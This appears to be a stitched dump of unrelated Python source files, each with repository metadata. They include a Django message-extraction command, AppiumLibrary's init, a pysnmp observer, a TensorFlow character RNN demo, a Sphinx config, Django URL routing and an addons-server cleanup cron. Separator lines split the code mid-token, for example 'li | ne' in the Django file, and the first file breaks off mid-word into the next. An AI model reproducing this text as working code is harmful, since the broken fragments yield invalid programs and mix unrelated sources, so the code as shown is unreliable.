if find_command(program) is None:
raise CommandError(
"Can't find %s. Make sure you have GNU gettext tools 0.15 or "
"newer installed." % program
)
@total_ordering
class TranslatableFile:
def __init__(self, dirpath, file_name, locale_dir):
self.file = file_name
self.dirpath = dirpath
self.locale_dir = locale_dir
def __repr__(self):
return "<%s: %s>" % (
self.__class__.__name__,
os.sep.join([self.dirpath, self.file]),
)
def __eq__(self, other):
return self.path == other.path
def __lt__(self, other):
return self.path < other.path
@property
def path(self):
return os.path.join(self.dirpath, self.file)
class BuildFile:
"""
Represent the state of a translatable file during the build process.
"""
def __init__(self, command, domain, translatable):
self.command = command
self.domain = domain
self.translatable = translatable
@cached_property
def is_templatized(self):
if self.domain == 'djangojs':
return self.command.gettext_version < (0, 18, 3)
elif self.domain == 'django':
file_ext = os.path.splitext(self.translatable.file)[1]
return file_ext != '.py'
return False
@cached_property
def path(self):
return self.translatable.path
@cached_property
def work_path(self):
"""
Path to a file which is being fed into GNU gettext pipeline. This may
be either a translatable or its preprocessed version.
"""
if not self.is_templatized:
return self.path
extension = {
'djangojs': 'c',
'django': 'py',
}.get(self.domain)
filename = '%s.%s' % (self.translatable.file, extension)
return os.path.join(self.translatable.dirpath, filename)
def preprocess(self):
"""
Preprocess (if necessary) a translatable file before passing it to
xgettext GNU gettext utility.
"""
if not self.is_templatized:
return
encoding = settings.FILE_CHARSET if self.command.settings_available else 'utf-8'
with open(self.path, 'r', encoding=encoding) as fp:
src_data = fp.read()
if self.domain == 'djangojs':
content = prepare_js_for_gettext(src_data)
elif self.domain == 'django':
content = templatize(src_data, origin=self.path[2:])
with open(self.work_path, 'w', encoding='utf-8') as fp:
fp.write(content)
def postprocess_messages(self, msgs):
"""
Postprocess messages generated by xgettext GNU gettext utility.
Transform paths as if these messages were generated from original
translatable files rather than from preprocessed versions.
"""
if not self.is_templatized:
return msgs
# Remove '.py' suffix
if os.name == 'nt':
# Preserve '.\' prefix on Windows to respect gettext behavior
old_path = self.work_path
new_path = self.path
else:
old_path = self.work_path[2:]
new_path = self.path[2:]
return re.sub(
r'^(#: .*)(' + re.escape(old_path) + r')',
lambda match: match.group().replace(old_path, new_path),
msgs,
flags=re.MULTILINE
)
def cleanup(self):
"""
Remove a preprocessed copy of a translatable file (if any).
"""
if self.is_templatized:
# This check is needed for the case of a symlinked file and its
# source being processed inside a single group (locale dir);
# removing either of those two removes both.
if os.path.exists(self.work_path):
os.unlink(self.work_path)
def normalize_eols(raw_contents):
"""
Take a block of raw text that will be passed through str.splitlines() to
get universal newlines treatment.
Return the resulting block of text with normalized `\n` EOL sequences ready
to be written to disk using current platform's native EOLs.
"""
lines_list = raw_contents.splitlines()
# Ensure last line has its EOL
if lines_list and lines_list[-1]:
lines_list.append('')
return '\n'.join(lines_list)
def write_pot_file(potfile, msgs):
"""
Write the `potfile` with the `msgs` contents, making sure its format is
valid.
"""
pot_lines = msgs.splitlines()
if os.path.exists(potfile):
# Strip the header
lines = dropwhile(len, pot_lines)
else:
lines = []
found, header_read = False, False
for line in pot_lines:
if not found and not header_read:
found = True
line = line.replace('charset=CHARSET', 'charset=UTF-8')
if not line and not found:
header_read = True
|
lines.append(li
|
ne)
msgs = '\n'.join(lines)
with open(potfile, 'a', encoding='utf-8') as fp:
fp.write(msgs)
class Command(BaseCommand):
help = (
"Runs over the entire source tree of the current directory and "
"pulls out all strings marked for translation. It creates (or updates) a message "
"file in the conf/locale (in the django tree) or locale (for projects and "
"applications) directory.\n\nYou must run this command with one of either the "
"--locale, --exclude, or --all options."
)
translatable_file_class = TranslatableFile
build_file_class = BuildFile
requires_system_checks = False
leave_locale_alone = True
msgmerge_options = ['-q', '--previous']
msguniq_options = ['--to-code=utf-8']
msgattrib_options = ['--no-obsolete']
xgettext_options = ['--from-code=UTF-8', '--add-comments=Translators']
def add_arguments(self, parser):
parser.add_argument(
'--locale', '-l', default=[], dest='locale', action='append',
help='Creates or updates the message files for the given locale(s) (e.g. pt_BR). '
'Can be used multiple times.',
)
parser.add_argument(
'--exclude', '-x', default=[], dest='exclude', action='append',
help='Locales to exclude. Default is none. Can be used multiple times.',
)
parser.add_argument(
'--domain', '-d', default='django', dest='domain',
help='The domain of the message files (default: "django").',
)
parser.add_argument(
'--all', '-a', action='store_true', dest='all',
help='Updates the message files for all existing locales.',
)
parser.add_argument(
'--extension', '-e', dest='extensions', action='append',
help='The file extension(s) to examine (default: "html,txt,py", or "js" '
'if the domain is "djangojs"). Separate multiple extensions with '
'commas, or use -e multiple times.',
)
parser.add_argument(
'--symlinks', '-s', action='store_true', dest='symlinks',
help='Follows symlinks to directories when exam
|
jollychang/robotframework-appiumlibrary
|
AppiumLibrary/__init__.py
|
Python
|
apache-2.0
| 5,544
| 0.004509
|
# -*- coding: utf-8 -*-
import os
from AppiumLibrary.keywords import *
from AppiumLibrary.version import VERSION
__version__ = VERSION
class AppiumLibrary(
_LoggingKeywords,
_RunOnFailureKeywords,
_ElementKeywords,
_ScreenshotKeywords,
_ApplicationManagementKeywords,
_WaitingKeywords,
_TouchKeywords,
_KeyeventKeywords,
_AndroidUtilsKeywords,
_ScreenrecordKeywords
):
"""AppiumLibrary is a Mobile App testing library for Robot Framework.
= Locating or specifying elements =
All keywords in AppiumLibrary that need to find an element on the page
take an argument, either a ``locator`` or a ``webelement``. ``locator``
is a string that describes how to locate an element using a syntax
specifying different location strategies. ``webelement`` is a variable that
holds a WebElement instance, which is a representation of the element.
== Using locators ==
By default, when
|
a locator is provided, it is matched against the key attributes
of the particular element type. For iOS and Android, key attribute is ``id`` for
all elements and locating elements is easy using just the ``id``. For example:
| Click Element id=my_element
New in AppiumLibrary 1.4, ``id`` and ``xpath`` are not required to be specified,
however ``xpath`` should start with ``//``
|
else just use ``xpath`` locator as explained below.
For example:
| Click Element my_element
| Wait Until Page Contains Element //*[@type="android.widget.EditText"]
Appium additionally supports some of the [https://w3c.github.io/webdriver/webdriver-spec.html|Mobile JSON Wire Protocol] locator strategies.
It is also possible to specify the approach AppiumLibrary should take
to find an element by specifying a lookup strategy with a locator
prefix. Supported strategies are:
| *Strategy* | *Example* | *Description* | *Note* |
| identifier | Click Element `|` identifier=my_element | Matches by @id attribute | |
| id | Click Element `|` id=my_element | Matches by @resource-id attribute | |
| accessibility_id | Click Element `|` accessibility_id=button3 | Accessibility options utilize. | |
| xpath | Click Element `|` xpath=//UIATableView/UIATableCell/UIAButton | Matches with arbitrary XPath | |
| class | Click Element `|` class=UIAPickerWheel | Matches by class | |
| android | Click Element `|` android=UiSelector().description('Apps') | Matches by Android UI Automator | |
| ios | Click Element `|` ios=.buttons().withName('Apps') | Matches by iOS UI Automation | |
| nsp | Click Element `|` nsp=name=="login" | Matches by iOSNsPredicate | Check PR: #196 |
| chain | Click Element `|` chain=XCUIElementTypeWindow[1]/* | Matches by iOS Class Chain | |
| css | Click Element `|` css=.green_button | Matches by css in webview | |
| name | Click Element `|` name=my_element | Matches by @name attribute | *Only valid* for Selendroid |
== Using webelements ==
Starting with version 1.4 of the AppiumLibrary, one can pass an argument
that contains a WebElement instead of a string locator. To get a WebElement,
use the new `Get WebElements` or `Get WebElement` keyword.
For example:
| @{elements} Get Webelements class=UIAButton
| Click Element @{elements}[2]
"""
ROBOT_LIBRARY_SCOPE = 'GLOBAL'
ROBOT_LIBRARY_VERSION = VERSION
def __init__(self, timeout=5, run_on_failure='Capture Page Screenshot'):
"""AppiumLibrary can be imported with optional arguments.
``timeout`` is the default timeout used to wait for all waiting actions.
It can be later set with `Set Appium Timeout`.
``run_on_failure`` specifies the name of a keyword (from any available
libraries) to execute when a AppiumLibrary keyword fails.
By default `Capture Page Screenshot` will be used to take a screenshot of the current page.
Using the value `No Operation` will disable this feature altogether. See
`Register Keyword To Run On Failure` keyword for more information about this
functionality.
Examples:
| Library | AppiumLibrary | 10 | # Sets default timeout to 10 seconds |
| Library | AppiumLibrary | timeout=10 | run_on_failure=No Operation | # Sets default timeout to 10 seconds and does nothing on failure |
"""
for base in AppiumLibrary.__bases__:
base.__init__(self)
self.set_appium_timeout(timeout)
self.register_keyword_to_run_on_failure(run_on_failure)
|
etingof/pysnmp
|
pysnmp/entity/observer.py
|
Python
|
bsd-2-clause
| 2,572
| 0.000778
|
#
# This file is part of pysnmp software.
#
# Copyright (c) 2005-2019, Ilya Etingof <etingof@gmail.com>
# License: http://snmplabs.com/pysnmp/license.html
#
from pysnmp import error
class MetaObserver(object):
"""This is a simple facility for exposing internal SNMP Engine
working details to pysnmp applications. These details are
basically local scope variables at a fixed point of execution.
Two modes of operations are offered:
1. Consumer: app can request an execution point context by execution point ID.
2. Provider: app can register its callback function (and context) to be invoked
once execution reaches specified point. All local scope variables
will be passed to the callback as in #1.
It's important to realize that execution context is only guaranteed
to exist to functions that are at the same or deeper level of invocation
relative to execution point specified.
"""
def __init__(self):
self.__observers = {}
self.__contexts = {}
self.__execpoints = {}
def registerObserver(self, cbFun, *execpoints, **kwargs):
if cbFun in self.__contexts:
raise error.PySnmpError('duplicate observer %s' % cbFun)
else:
self.__contexts[cbFun] = kwargs.get('cbCtx')
for execpoint in execpoints:
if execpoint not in self.__observers:
|
self.__observers[execpoint] = []
self.__observers[execpoint].append(cbFun)
def unregisterObserver(self, cbFun=None):
if cbFun is None:
self.__observers.clear()
self._
|
_contexts.clear()
else:
for execpoint in dict(self.__observers):
if cbFun in self.__observers[execpoint]:
self.__observers[execpoint].remove(cbFun)
if not self.__observers[execpoint]:
del self.__observers[execpoint]
def storeExecutionContext(self, snmpEngine, execpoint, variables):
self.__execpoints[execpoint] = variables
if execpoint in self.__observers:
for cbFun in self.__observers[execpoint]:
cbFun(snmpEngine, execpoint, variables, self.__contexts[cbFun])
def clearExecutionContext(self, snmpEngine, *execpoints):
if execpoints:
for execpoint in execpoints:
del self.__execpoints[execpoint]
else:
self.__execpoints.clear()
def getExecutionContext(self, execpoint):
return self.__execpoints[execpoint]
|
RishiRamraj/interviews
|
solutions/algorithms/bst.py
|
Python
|
mit
| 667
| 0.004498
|
'''
Problem:
Find the kth smallest element in a bst without using static/global variables.
'''
def find
|
(node, k, items=0):
# Base case.
if not node:
return items, None
# Decode the node.
left, value, right = node
# Check left.
index, result = find(left, k, items)
# Exit early.
if result:
return index, result
# Check this node.
next = index + 1
if next == k:
return next, value
# Check the right.
return find(right, k, next)
test = (((None,
|
1, None), 2, (None, 3, None)), 4, ((None, 5, None), 5, (None, 6, None)))
#test = ((None, 1, None), 2, (None, 3, None))
print(find(test, 11))
|
laurentb/weboob
|
modules/ensap/__init__.py
|
Python
|
lgpl-3.0
| 885
| 0
|
# -*- coding: utf-8 -*-
# Copyright(C) 2017 Juliette Fourcot
#
# This file is part of a weboob module.
#
# This weboob module is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later ver
|
sion.
#
# This weboob module is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more det
|
ails.
#
# You should have received a copy of the GNU Lesser General Public License
# along with this weboob module. If not, see <http://www.gnu.org/licenses/>.
from __future__ import unicode_literals
from .module import EnsapModule
__all__ = ['EnsapModule']
|
jaekookang/useful_bits
|
Machine_Learning/RNN_LSTM/predict_character/rnn_char_windowing.py
|
Python
|
mit
| 7,262
| 0.006063
|
# coding: utf-8
# # Simple Character-level Language Model using vanilla RNN
# 2017-04-21 jkang
# Python3.5
# TensorFlow1.0.1
#
# - <p style="color:red">Different window sizes were applied</p> e.g. n_window = 3 (three-character window)
# - input: 'hello_world_good_morning_see_you_hello_grea'
# - output: 'ello_world_good_morning_see_you_hello_great'
#
# ### Reference:
# - https://github.com/tensorflow/tensorflow/blob/master/tensorflow/contrib/rnn/python/ops/core_rnn_cell_impl.py
# - https://github.com/aymericdamien/TensorFlow-Examples
# - https://hunkim.github.io/ml/
#
# ### Comment:
# - 단어 단위가 아닌 문자 단위로 훈련함
# - 하나의 example만 훈련에 사용함
# : 하나의 example을 windowing하여 여러 샘플을 만들어 냄 (새로운 샘플의 크기는 window_size)
# - Cell의 종류는 BasicRNNCell을 사용함 (첫번째 Reference 참조)
# - dynamic_rnn방식 사용 (기존 tf.nn.rnn보다 더 시간-계산 효율적이라고 함)
# - AdamOptimizer를 사용
# In[1]:
import tensorflow as tf
import numpy as np
import matplotlib.pyplot as plt
import random
# Input/Ouput data
char_raw = 'hello_world_good_morning_see_you_hello_great'
char_list = sorted(list(set(char_raw)))
char_to_idx = {c: i for i, c in enumerate(char_list)}
idx_to_char = {i: c for i, c in enumerate(char_list)}
char_data = [char_to_idx[c] for c in char_raw]
char_data_one_hot = tf.one_hot(char_data, depth=len(
char_list), on_value=1., off_value=0., axis=1, dtype=tf.float32)
char_input = char_data_one_hot[:-1, :] # 'hello_world_good_morning_see_you_hello_grea'
char_output = char_data_one_hot[1:, :] # 'ello_world_good_morning_see_you_hello_great'
with tf.Session() as sess:
char_input = char_input.eval()
char_output = char_output.eval()
# In[2]:
# Learning parameters
learning_rate = 0.001
max_iter = 1000
# Network Parameters
n_input_dim = char_input.shape[1]
n_input_len = char_input.shape[0]
n_output_dim = char_output.shape[1]
n_output_len = char_output.shape[0]
n_hidden = 100
n_window = 2 # number of characters in one window (like a mini-batch)
# TensorFlow graph
# (batch_size) x (time_step) x (input_dimension)
x_data = tf.placeholder(tf.float32, [None, None, n_input_dim])
# (batch_size) x (time_step) x (output_dimension)
y_data = tf.placeholder(tf.float32, [None, None, n_output_dim])
# Parameters
weights = {
'out': tf.Variable(tf.truncated_normal([n_hidden, n_output_dim]))
}
biases = {
'out': tf.Variable(tf.truncated_normal([n_output_dim]))
}
# In[3]:
def make_window_batch(x, y, window_size):
'''
This function will generate samples based on window_size from (x, y)
Although
|
(x, y) is one example, it will create multiple examples with the length of window_size
x: (time_step) x (input_dim)
y: (time_step) x (output_dim)
x_out: (total_batch) x (batch_size) x (
|
window_size) x (input_dim)
y_out: (total_batch) x (batch_size) x (window_size) x (output_dim)
total_batch x batch_size <= examples
'''
# (batch_size) x (window_size) x (dim)
# n_examples is calculated by sliding one character with window_size
n_examples = x.shape[0] - window_size + 1 # n_examples = batch_size
x_batch = np.empty((n_examples, window_size, x.shape[1]))
y_batch = np.empty((n_examples, window_size, y.shape[1]))
for i in range(n_examples):
x_batch[i, :, :] = x[i:i + window_size, :]
y_batch[i, :, :] = y[i:i + window_size, :]
z = list(zip(x_batch, y_batch))
random.shuffle(z)
x_batch, y_batch = zip(*z)
x_batch = np.array(x_batch)
y_batch = np.array(y_batch)
# (total_batch) x (batch_size) x (window_size) x (dim)
# total_batch is set to 1 (no mini-batch)
x_new = x_batch.reshape((n_examples, window_size, x_batch.shape[2]))
y_new = y_batch.reshape((n_examples, window_size, y_batch.shape[2]))
return x_new, y_new, n_examples
# In[4]:
def RNN(x, weights, biases):
cell = tf.contrib.rnn.BasicRNNCell(n_hidden) # Make RNNCell
outputs, states = tf.nn.dynamic_rnn(cell, x, time_major=False, dtype=tf.float32)
'''
**Notes on tf.nn.dynamic_rnn**
- 'x' can have shape (batch)x(time)x(input_dim), if time_major=False or
(time)x(batch)x(input_dim), if time_major=True
- 'outputs' can have the same shape as 'x'
(batch)x(time)x(input_dim), if time_major=False or
(time)x(batch)x(input_dim), if time_major=True
- 'states' is the final state, determined by batch and hidden_dim
'''
# outputs[-1] is outputs for the last example in the mini-batch
return tf.matmul(outputs[-1], weights['out']) + biases['out']
def softmax(x):
rowmax = np.max(x, axis=1)
x -= rowmax.reshape((x.shape[0] ,1)) # for numerical stability
x = np.exp(x)
sum_x = np.sum(x, axis=1).reshape((x.shape[0],1))
return x / sum_x
pred = RNN(x_data, weights, biases)
cost = tf.reduce_mean(tf.squared_difference(pred, y_data))
optimizer = tf.train.AdamOptimizer(learning_rate=learning_rate).minimize(cost)
# In[5]:
# Learning
with tf.Session() as sess:
sess.run(tf.global_variables_initializer())
for i in range(max_iter):
loss = 0
x_batch, y_batch, n_examples = make_window_batch(char_input, char_output, n_window)
for ibatch in range(x_batch.shape[0]):
x_train = x_batch[ibatch, :, :].reshape((1,-1,n_input_dim))
y_train = y_batch[ibatch, :, :].reshape((1,-1,n_output_dim))
x_test = char_input.reshape((1, n_input_len, n_input_dim))
y_test = char_output.reshape((1, n_input_len, n_input_dim))
c, _ = sess.run([cost, optimizer], feed_dict={
x_data: x_train, y_data: y_train})
p = sess.run(pred, feed_dict={x_data: x_test, y_data: y_test})
loss += c
mean_mse = loss / n_examples
if i == (max_iter-1):
pred_act = softmax(p)
if (i+1) % 100 == 0:
pred_out = np.argmax(p, axis=1)
accuracy = np.sum(char_data[1:] == pred_out)/n_output_len*100
print('Epoch:{:>4}/{},'.format(i+1,max_iter),
'Cost:{:.4f},'.format(mean_mse),
'Acc:{:>.1f},'.format(accuracy),
'Predict:', ''.join([idx_to_char[i] for i in pred_out]))
# In[6]:
# Probability plot
fig, ax = plt.subplots()
fig.set_size_inches(15,20)
plt.title('Input Sequence', y=1.08, fontsize=20)
plt.xlabel('Probability of Next Character(y) Given Current One(x)'+
'\n[window_size={}, accuracy={:.1f}]'.format(n_window, accuracy),
fontsize=20, y=1.5)
plt.ylabel('Character List', fontsize=20)
plot = plt.imshow(pred_act.T, cmap=plt.get_cmap('plasma'))
fig.colorbar(plot, fraction=0.015, pad=0.04)
plt.xticks(np.arange(len(char_data)-1), list(char_raw)[:-1], fontsize=15)
plt.yticks(np.arange(len(char_list)), [idx_to_char[i] for i in range(len(char_list))], fontsize=15)
ax.xaxis.tick_top()
# Annotate
for i, idx in zip(range(len(pred_out)), pred_out):
annotation = idx_to_char[idx]
ax.annotate(annotation, xy=(i-0.2, idx+0.2), fontsize=12)
plt.show()
# f.savefig('result_' + idx + '.png')
|
daviortega/bitk3
|
docs/conf.py
|
Python
|
mit
| 8,433
| 0.005336
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# bitk3 documentation build configuration file, created by
# sphinx-quickstart on Tue Jul 9 22:26:36 2013.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys
import os
# If extensions (or modules to document with autodoc) are in another
# directory, add these directories to sys.path here. If the directory is
# relative to the documentation root, use os.path.abspath to make it
# absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
# Get the project root dir, which is the parent dir of this
cwd = os.getcwd()
project_root = os.path.dirname(cwd)
# Insert the project root dir as the first element in the PYTHONPATH.
# This lets us ensure that the source package is imported, and that its
# version is used.
sys.path.insert(0, project_root)
import bitk3
# -- General configuration ---------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = ['sphinx.ext.autodoc', 'sphinx.ext.viewcode']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'BIoinformatics ToolKit 3'
copyright = u"2016, Davi Ortega"
# The version info for the project you're documenting, acts as replacement
# for |version| and |release|, also used in various other places throughout
# the built documents.
#
# The short X.Y version.
version = bitk3.__version__
# The full version, including alpha/beta/rc tags.
release = bitk3.__version__
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to
# some non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all
# documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built
# documents.
#keep_warnings = False
# -- Options for HTML output -------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'default'
# Theme options are theme-specific and customize the look and feel of a
# theme further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as
# html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the
# top of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon
# of the docs. This file should be a Windows icon file (.ico) being
# 16x16 or 32x32 pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets)
# here, relative to this directory. They are copied after the builtin
# static files, so a file named "default.css" will overwrite the builtin
# "default.css".
html_static_path = ['_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page
# bottom, using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names
# to template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer.
# Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer.
# Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages
# will contain a <link> tag referring to it. The value of this option
# must be the base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'bitk3doc'
# -- Options for LaTeX output ------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass
# [howto/manual]).
latex_documents = [
('index', 'bitk3.tex',
u'BIoinformatics ToolKit 3 Documentation',
u'Davi Ortega', 'manual'),
]
# The name of an image file (relative to this directory) to place at
# the top of the title page.
#latex_logo = None
# For "manual" documents,
|
if this is true, then toplevel headings
# are parts, not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = Fa
|
lse
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output ------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'bitk3',
u'BIoinformatics ToolKit 3 Documentation',
[u'Davi Ortega'], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output ----------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
('index', 'bitk3',
u'BIoinformatics ToolKit 3 Documentation',
u'Davi Ortega',
'bitk3',
'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no
|
ppokrovsky/pyvdp
|
demo/demo/urls.py
|
Python
|
mit
| 2,820
| 0.002837
|
from django.conf.urls import include, url
from demo.views import common
from demo.views.visadirect import fundstransfer, mvisa, reports, watchlist
from demo.views.pav import pav
from demo.views.dcas import cardinquiry
from demo.views.merchantsearch import search
from demo.views.paai.fundstransferattinq.cardattributes.fundstransferinquiry import funds_transfer_inquiry
from demo.views.paai.generalattinq.cardattributes.generalinquiry import general_inquiry
urlpatterns = [
url(r'^$', common.index),
# Payment Account Attributes Inquiry
url(r'^paai$', common.paai, name='paai'),
url(r'^paai/', include([
url(r'^fundstransferattinq/cardattributes/fundstransferinquiry$', funds_transfer_inquiry, name='paai_fti'),
url(r'^generalattinq/cardattributes/generalinquiry$', general_inquiry, name='paai_gi')
])),
# Merchant search
url(r'^merchantsearch$', common.merchantsearch, name='merchantsearch'),
url(r'^merchantsearch/', include([
url(r'^search$', search.merchant_search, name='merchantsearch_search'),
])),
# Payment account validation methods urls
url(r'^pav$', common.pav, name='pav'),
url(r'^pav/', include([
url(r'^cardvalidation$', pav.card_validation, name='pav_cardvalidation')
])),
# Digital card and account services
url(r'^dcas$', common.dcas, name='dcas'),
url(r'^dcas/', include([
url(r'^cardinquiry$', cardinquiry.debit_card_inquiry, name='dcas_debitcardinquiry')
])),
# VISA Direct methods urls
url(r'^visadirect$', common.visa_direct, name='vd'),
url(r'^visadirect/', include([
# FundsTransfer API
url(r'^fundstransfer$', fundstransfer.index, name='vd_ft'),
url(r'^fundstransfer/', include([
url(r'^pullfunds$', fundstransfer.pull, name='vd_ft_pullfunds'),
url(r'^pushfunds$', fundstransfer.push, name='vd_ft_pushfunds'),
url(r'^reversefunds$', fundstransfer.reverse, name='vd_ft_reversefunds'),
])),
# mVISA API
url(r'^mvisa$', mvisa.index, name='vd_mvisa'),
url(r'^mvisa/', include([
url(r'^cashinpushpayments$', mvisa.cipp, name='vd_mvisa_cipp'),
url(r'^cashoutpushpayments$', mvisa.copp, name='vd_mvi
|
sa_copp'),
url(r'^merchantpushpayments$', mvisa.mpp, name='vd_mvisa_mpp'),
])),
# Reports API
url(r'^reports$', reports.index, name='vd_reports'),
url(r'^reports/', include([
url(r'^transactiondata$', reports.transactiondata, name='vd_reports_transactiondata'),
])),
# WatchList Inquiry methods urls
url(r'^watchlist$'
|
, watchlist.index, name='vd_wl'),
url(r'^watchlist/', include([
url(r'^inquiry$', watchlist.inquiry, name='vd_wl_inquiry')
]))
])),
]
|
snakeego/pyactors
|
tests/test_forked_green_actors.py
|
Python
|
bsd-2-clause
| 1,024
| 0.003906
|
import sys
if '' not in sys.path:
sys.path.append('')
import time
import unittest
from pyactors.logs import file_logger
from pyactors.exceptions import EmptyInboxException
from tests import ForkedGreActor as TestActor
from multiprocessing import Manager
class ForkedGreenletActorTest(unittest.TestCase):
def test_run(self):
''' test_forked_green_actors.test_run
'''
test_name = 'test_forked_gen_actors.test_run'
logger = file_logger(test_name, filename='logs/%s.log' % test_name)
actor = TestActor()
a
|
ctor.start()
while actor.processing:
time.sleep(0.1)
actor.stop()
result = []
while True:
try:
result.append(actor.inbox.get())
except EmptyInboxException:
break
self.assertEqual(len(result), 10)
self.assert
|
Equal(actor.processing, False)
self.assertEqual(actor.waiting, False)
if __name__ == '__main__':
unittest.main()
|
charles-vdulac/django-roa
|
examples/django_roa_client/forms.py
|
Python
|
bsd-3-clause
| 432
| 0.002315
|
from django import forms
from django_roa_client.models import RemotePage, RemotePageWithRelations
class TestForm(forms.Form):
test_fiel
|
d = forms.CharField()
remote_page = forms.ModelChoiceField(queryset=RemotePage.objects.all())
class
|
RemotePageForm(forms.ModelForm):
class Meta:
model = RemotePage
class RemotePageWithRelationsForm(forms.ModelForm):
class Meta:
model = RemotePageWithRelations
|
mozilla/olympia
|
src/olympia/amo/cron.py
|
Python
|
bsd-3-clause
| 3,247
| 0.000924
|
from datetime import datetime, timedelta
from django.core.files.storage import default_storage as storage
import olympia.core.logger
from olympia import amo
from olympia.activity.models import ActivityLog
from olympia.addons.models import Addon
from olympia.addons.tasks import delete_addons
from olympia.amo.utils import chunked
from olympia.files.models import FileUpload
from olympia.scanners.models import ScannerResult
from olympia.amo.models import FakeEmail
from . import tasks
from .sitemap import (
get_sitemap_path,
get_sitemaps,
get_sitemap_section_pages,
render_index_xml,
)
log = olympia.core.logger.getLogger('z.cron')
def gc(test_result=True):
"""Site-wide garbage collections."""
def days_ago(days):
return datetime.today() - timedelta(days=days)
log.info('Collecting data to delete')
logs = (
ActivityLog.objects.filter(created__lt=days_ago(90))
.exclude(action__in=amo.LOG_KEEP)
.values_list('id', flat=True)
)
for chunk in chunked(logs, 100):
tasks.delete_logs.delay(chunk)
two_weeks_ago = days_ago(15)
# Hard-delete stale add-ons with no versions. No email should be sent.
versionless_addons = Addon.unfiltered.filter(
versions__pk=None, created__lte=two_weeks_ago
).values_list('pk', flat=True)
for chunk in chunked(versionless_addons, 100):
delete_addons.delay(chunk, with_deleted=True)
|
# Delete stale FileUploads.
stale_uploads = FileUpload.objects.filter(created__lte=two_weeks_ago).order_by(
|
'id')
for file_upload in stale_uploads:
log.info(
'[FileUpload:{uuid}] Removing file: {path}'.format(
uuid=file_upload.uuid, path=file_upload.path
)
)
if file_upload.path:
try:
storage.delete(file_upload.path)
except OSError:
pass
file_upload.delete()
# Delete stale ScannerResults.
ScannerResult.objects.filter(upload=None, version=None).delete()
# Delete fake emails older than 90 days
FakeEmail.objects.filter(created__lte=days_ago(90)).delete()
def write_sitemaps(section=None, app_name=None):
index_url = get_sitemap_path(None, None)
sitemaps = get_sitemaps()
if (not section or section == 'index') and not app_name:
with storage.open(index_url, 'w') as index_file:
log.info('Writing sitemap index')
index_file.write(render_index_xml(sitemaps))
for _section, _app_name, _page in get_sitemap_section_pages(sitemaps):
if (section and section != _section) or (app_name and app_name != _app_name):
continue
if _page % 1000 == 1:
# log an info message every 1000 pages in a _section, _app_name
